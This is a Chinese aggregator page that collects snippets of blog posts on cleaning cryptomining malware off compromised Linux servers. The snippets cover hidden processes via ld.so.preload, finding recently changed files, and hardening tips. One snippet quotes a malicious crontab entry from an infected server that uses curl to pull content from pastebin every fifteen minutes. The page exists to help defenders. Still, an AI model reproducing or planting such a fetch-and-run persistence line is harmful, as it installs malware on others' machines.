原文:服务器被挖矿

查看哪个进程占据cup 通过 top 或者使用 ps aux 我这个通过top 命令看不到哪个进程占用了cup ,执行 cat etc ld.so.preload 查看,里面也加载了异常的文件,判断是用于隐藏进程用的, 建议将其内容注释掉或删除,执行ldconfig 然后再使用top 查看下进程 使用ls lt etc head 查看最近变动的文件目录 或者使用 find 命令查找最近修改过的文件 ...

2018-09-02 10:08 2 2273 推荐指数:

查看详情

服务器挖矿怎么办

背景 根据某安全公司安全威胁检测到在2019年中,恶意软件拦截量为181.07亿次,其中挖矿类恶意软件感染占比最多(58%),其次为远程木马(占比14%),企业或组织内文件共享等机制也使得感染型病毒的比例在9%左右。恶意软件一哥挖矿软件攻击势头非常猛,加密货币挖矿流量较去年增长约100%,在类型 ...

Sun Jun 21 23:46:00 CST 2020 0 1715
黑客用我们服务器挖矿

新的一天的开始 周五早上刚到公司,同事来问我系统为啥打不开了?我第一反应就是肯定 Nginx 服务器挂了呗,立马就去登录服务器看看,但此时发现已经完全远程登录不上这台部署了 Nginx 和 Redis 的服务器了,此刻心理活动如下: 难道服务器欠费了? 难道服务器到期了? 都不对阿,一起 ...

Tue Mar 27 16:27:00 CST 2018 47 12084
挖矿木马】服务器挖矿病毒入侵的清理思路

一般情况下,挖矿病毒都是自动扫描+自动挂马生成的,并不会是有专人进行攻击,所以也比较好清除,注意清除之后需要 check 有无后门。 最重要几点(也可能是被hack的原因):禁止 ROOT 用户登陆,ROOT 不能使用弱密码,FRP 需要配置,不能使用默认选项。 挖矿进程占用的 CPU 资源 ...

Wed Jan 06 19:27:00 CST 2021 0 515
服务器挖矿防御方案

最近很多小伙伴服务器都被挖矿了,简单总结下在应急过程中,常遇到的一些被挖矿的特征,以及防护方法,工具后面会进行详细的介绍分享。 问题所在 要防止被挖矿,首先要明白挖矿的本质。挖矿本质就是快速产出,利用可以利用的资源,实现快速产出,获取收益 ...

Sat May 22 18:01:00 CST 2021 0 233
如何拯救被植入挖矿代码的服务器

上个月末,我也尝试到了服务器被病毒入侵的滋味,正好这个月末来复盘一下。 怎么说呢,那个感觉就像是你自己的娃在外面被揍了一样,你得想办法为孩子出人头地呀,是吧。于是这一波病毒反击战就正式上演了。 ## 一出好戏 先说一下我是怎么发现服务器被入侵的。那是在一个愉快的下班时间,我的手机端又提示收到了阿里 ...

Sun Dec 08 05:42:00 CST 2019 0 257
服务器中了挖矿病毒

这几天阿里云云服务器cpu一直跑满,一查发现有个定时任务,在搜索一下,发现自己中毒了,原来前几天搞redis学习的时候设置了个弱密码,被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...

Sat Apr 13 20:26:00 CST 2019 0 1536
服务器被入侵挖矿处理

crontab,比如 redis 可以把缓存内容写入本地文件的漏洞,他就可以随便在服务器的 /root/.s ...

Tue Aug 14 22:33:00 CST 2018 0 918
服务器挖矿程序攻击

症状:服务器cpu和内存占用100%,阿里云提示:恶意进程(云查杀)-挖矿程序待处理 1.检查进程,命令:top,发现进程:30283占用cpu最高,应该就是它了 2.查看位置,发现在opt文件下,并且多了2个陌生的文件。 3.进入/tmp目录,按照时间 ...

Wed Feb 12 06:40:00 CST 2020 0 957
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM